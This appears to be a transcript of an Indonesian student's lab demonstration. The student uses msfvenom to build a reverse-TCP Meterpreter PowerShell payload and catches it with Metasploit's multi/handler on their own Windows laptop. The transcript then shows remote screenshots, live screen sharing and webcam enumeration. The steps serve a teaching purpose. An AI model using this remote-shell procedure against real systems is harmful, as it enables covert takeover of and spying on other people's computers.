Oke, assalamualaikum warahmatullahi wabarakatuh. Perkenalkan, saya Nadila Putri dengan NIM akhir 052 dari kelas B Prodi Sistem Informasi. Di sini saya akan melakukan pengujian eksploitasi tingkat lanjut menggunakan Metasploit Framework, yang mana tujuannya adalah untuk mendapatkan kendali penuh terhadap sistem operasi Windows target secara jarak jauh. Di sini saya menggunakan alat MSF Venom untuk membuat payload berbahaya bermodus perintah PowerShell dan menggunakan MSF Console Metasploit sebagai penerima koneksi atau listener ketika payload tersebut dieksekusi di target. Jadi langsung saja kepada langkah kerjanya. Yang pertama, saya akan membuka Kali Linux saya. Lalu kita akan masuk ke terminal Linux. Pertama kita bakal ngecek IP-nya terlebih dahulu. Nah, kita perlu cari baris IP ini untuk agar kita tahu IP mana yang akan dimasukkan ke dalam perintahnya. Ini dapat dilihat kalau IP eternalnya 192.168.1.48. Terus kita cek juga di PowerShell kita apakah coba nah, ini di jaringan yang sama IP-nya 192.168.138, ini 148. Jadi selanjutnya kita coba buat bikin payloadnya. Jadi perintahnya itu msf venom minp windows x64 /meterpreter reverse tcp reverse. Lalu lhostnya kita pakai satu ETH0 tadi, inetnya 192.168.1.48. Terus kita atur L portnya dengan 4444. Terus min F atau format, terus min cmd. Nah, jadi MSF Venom ini alat Metasploit untuk membuat berbagai macam file eksploitasi. Terus min p Windows x64 /meterpreter reverse tcp ini adalah parameter payload, di mana kita memilih payload untuk Windows 64 bit berbasis meterpreter. Artinya ini shell khusus yang punya banyak fitur ya. Dan juga cara koneksinya adalah reverse TCP, artinya target yang akan menghubungi laptop kita, bukan kita yang mendobrak masuk. Cara ini sering dipakai karena lebih mudah daripada cara yang sebaliknya. Terus kita enter aja, dia bakal ngebikin file payload yang bakal kita eksekusi di PowerShell target nantinya. Nah, ini udah kebikin PowerShell.exe nya, kita tinggal copy. Kita copy kita copy dari PowerShell.exe sampai selesai tadi. Terus kita klik kanan, copy selection, kita buka PowerShell dan paste ini, kita paste aja. Nah, ini udah di paste. Terus kita balik ke Kali, tapi kita buka terminal yang lain buat mempermudah. Dan juga ini saya besarin dulu. Kita lanjut buka MSF Console. Ini itu fungsinya mengaktifkan konsol kontrol Metasploit di terminal tempat kita akan mengendalikan serangan ke target. Ini fungsinya buat ngebuka juga aplikasi utama Metasploit Framework.
Nah, ini udah terbuka Metasploit frameworknya. Terus kita pilih buat menggunakan modul exploit multi handler. Jadi modul ini bertindak sebagai penerima yang tugasnya hanya diam dan standby menunggu kiriman koneksi dari payload yang tadi kita salin di Windows itu kalau berjalan. Nah, terus kita set payloadnya dulu. Set payloadnya kayak yang kita ketikkan sebelumnya, payload Windows X464 meter preter reverse TCP reverse TCP. Terus kita enter aja, payloadnya udah berhasil. Terus kita lihat show options. Ini tuh buat ngelihat apakah semua yang perlu kita setting tuh udah tersetting. Options. Oke. Nah, ini dapat kita lihat kalau L-portnya udah tersetting sama 44, tapi untuk L-hostnya belum disetting, jadi kita setting dulu. Set L-host IP-nya tadi 192 192.168.148. Satu enam delapan 148. Terus kita enter aja. Nah, ini tuh fungsinya ngebuka pintu penerima panggilan khususnya di alamat IP laptop kali Linux kita. Terus kita bisa L-portnya tadi port yang bakal kita pakai gitu. Terus kita bisa langsung ketik exploit. Sebelum itu kita enter dulu yang di PowerShell tadi. Kita enter PowerShell. Terus kita enter juga exploit. Di exploit ini bakal mendengarkan menunggu koneksi dari PowerShell tadi. Dimana artinya laptop kita tuh udah siap buat nerima koneksi dari PowerShell. Nah, ini kita udah kebuka Meterpreter session. Ini kita bisa langsung nyoba misalnya sysinfo. Nah, kita langsung dapat informasi kalau komputernya itu laptop Ravel 5GBB, terus OS-nya Windows 11 dengan arsitektur 64 bit. Terus kita bisa juga dapat get UID ID-nya. Server username-nya itu Asus. Nah, terus kita bisa juga ketik help itu buat ngeliat perintah apa aja sih yang sebenarnya bisa kita pakai untuk selama eksploitasi ini. Nah, tadi udah beberapa kita pakai. Nah, ini ada juga webcam list. Webcam. Nah, ini jadi ada dua, satu webcam bawaan dari laptopnya dan satu lagi dari OBS virtual camera. Nah, karena ini sebenarnya kita bisa sambil buka kamera dari target, tapi karena kameranya saat ini saya pakai untuk OBS Studio, jadi mungkin agak sulit digunakan. Jadi kita nyoba perintah lain. Contohnya apakah screenshot bisa?
ini home kali, kita buka open folder. Simpan ini mana ya? Tadi namanya NOASC, berarti ini ya. Nah, saya kan tadi lagi buka ini, jadi itu bisa ngambil foto layar Windows target secara diam-diam saat itu juga, dan disimpan file gambarnya di Kali Linux. Tapi karena saya menyerang laptop saya sendiri, jadi kelihatannya karena saat ini saya sedang membuka terminal Kali, jadi yang disitu jadi terminal Kali. Nah, ini ada banyak banget fitur ya, ada screen share juga. Nih, kelihatan kan nih kalau saya lagi buka apa. Coba kita belah layar ini. Tuh, bakal kelihatan kalau saya juga lagi buka PowerShell. Terus ini streamnya real time ya, dan kalau apa yang dibuka. Terus kita balik ke terminal Kali. Jadi kesimpulannya, simulasi eksploitasi menggunakan Metasploit ini berhasil disimulasikan dengan metode reverse TCP. Jadi dengan memanfaatkan kelengahan target yang mengeksekusi kode PowerShell berbahaya, penyerang dapat mengambil alih kendali penuh atas sistem operasi target. Pengujian ini berhasil membuktikan dampak bahaya dari eksekusi perintah tak dikenal yang dapat berujung pada pencurian data dan pemantauan sistem via screenshot secara ilegal dan screen sharing tadi. Jadi ini terhenti karena di PowerShell-nya udah terhenti, kelihatan dari user ini. Mungkin sekian dari saya, kurang lebihnya mohon maaf. Terima kasih.